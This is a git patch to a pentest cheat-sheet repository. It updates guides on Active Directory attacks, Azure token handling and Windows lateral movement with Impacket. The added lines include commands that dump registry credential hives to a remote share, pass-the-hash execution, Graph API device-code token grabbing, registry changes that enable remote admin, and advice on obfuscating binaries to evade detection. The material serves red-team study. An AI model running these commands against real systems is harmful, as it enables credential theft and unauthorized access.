From 8442b304c965596366146739728668227f870013 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 15 Feb 2023 17:03:49 +0100 Subject: [PATCH] SMBExec + Refresh & Access Token Azure --- .../Active Directory Attack.md | 3 + .../Cloud - Azure Pentest.md | 118 +++++++++++++----- .../Windows - Using credentials.md | 42 +++++-- 3 files changed, 122 insertions(+), 41 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a1a3828..8d307d7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2966,6 +2966,9 @@ This groups grants the following privileges : $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} ``` +* Retrieve SAM,SECURITY and SYSTEM hives + * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` + * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` ### Abusing Active Directory ACLs/ACEs diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 8170edd..c327ac0 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -3,6 +3,9 @@ ## Summary * [Azure Recon Tools](#azure-recon-tools) +* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell) + * [Graph API Refresh Token](#graph-api-refresh-token) + * [Graph API Access Token](#graph-api-access-token) * [Terminology](#terminology) * [Training](#training) * [Enumeration](#enumeration) @@ -60,35 +63,6 @@ ## Azure Recon Tools -* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. - ```powershell - pipenv shell - roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] - roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] - roadrecon auth -u test@.onmicrosoft.com -p - roadrecon gather - roadrecon gui - ``` -* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects - ```powershell - # session 1 - backend - pipenv shell - python ssbackend.pyz - - # session 2 - frontend - cd C:\Tools\stormspotter\frontend\dist\spa\ - quasar.cmd serve -p 9091 --history - - # session 3 - collector - pipenv shell - az login -u test@.onmicrosoft.com -p - python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli - - # Web access on http://localhost:9091 - Username: neo4j - Password: BloodHound - Server: bolt://localhost:7687 - ``` * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound ```powershell # First, retrieve a refresh token (-r) if username/password isn't supported. @@ -98,6 +72,8 @@ $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] # Second, launch azurehound collector + ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json + ## Connects on your Azure account using the refresh token provided and the tenant of the account ## and collects every possible objects in contoso.microsoft.com. Results are stored in json ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" @@ -141,13 +117,42 @@ MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname ``` -* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit +* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit ```ps1 . .\BARK.ps1 $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress ``` +* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. + ```powershell + pipenv shell + roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] + roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] + roadrecon auth -u test@.onmicrosoft.com -p + roadrecon gather + roadrecon gui + ``` +* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects + ```powershell + # session 1 - backend + pipenv shell + python ssbackend.pyz + + # session 2 - frontend + cd C:\Tools\stormspotter\frontend\dist\spa\ + quasar.cmd serve -p 9091 --history + + # session 3 - collector + pipenv shell + az login -u test@.onmicrosoft.com -p + python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli + + # Web access on http://localhost:9091 + Username: neo4j + Password: BloodHound + Server: bolt://localhost:7687 + ``` * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. ```powershell @@ -208,6 +213,59 @@ $ Create-Backdoor, Execute-Backdoor ``` +## Authenticating to the Microsoft Graph API in PowerShell + +* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in) + +| Name | GUID | +|----------------------------|--------------------------------------| +| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 | +| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | +| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | + + +### Graph API Refresh Token + +Authenticating to the Microsoft Graph API in PowerShell + +```ps1 +$body = @{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "resource" = "https://graph.microsoft.com" # Microsoft Graph API +} +$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" +$Headers=@{} +$Headers["User-Agent"] = $UserAgent +$authResponse = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$authResponse +``` + +### Graph API Access Token + +This request require getting the Refresh Token. + +```ps1 +$body=@{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" + "code" = $authResponse.device_code +} +$Tokens = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$Tokens +``` + + + ## Terminology > Basic Azure AD terminologies diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 549f8ea..04d9580 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -11,6 +11,7 @@ * [Impacket](#impacket) * [PSExec](#psexec) * [WMIExec](#wmiexec) + * [SMBExec](#smbexec) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol) @@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. The following table summarize the port used by each scripts. -| Method | Port Used | -|-------------|---------------------------------------| -| psexec.py | tcp/445 | -| smbexec.py | tcp/445 | -| atexec.py | tcp/445 | -| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | -| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | +| Method | Port Used | Admin Required | +|-------------|---------------------------------------|----------------| +| psexec.py | tcp/445 | Yes | +| smbexec.py | tcp/445 | No | +| atexec.py | tcp/445 | No | +| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No | +| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes | * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary. ```ps1 @@ -153,15 +154,23 @@ The following table summarize the port used by each scripts. wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 ``` +To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute: +`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1` +To prevent RID 500 from being able to WmiExec or PsExec, execute: +`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1` + + ### PSExec -PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb) +Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name. +PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)) Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe` Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`. You need to update the pipe name to match "Custom_communication" in the line 163 -`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` +`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files). + ### WMIExec @@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` +### SMBExec + +It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)). + +It will create a new service every time we execute a command. It will also generate an Event 7045. + +By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`. + + ## RDP Remote Desktop Protocol :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors. @@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands; ``` - ## Powershell Remoting Protocol ### Powershell Credentials @@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) -- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) +- [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) - [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf) +- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol) +- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/) +- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/) \ No newline at end of file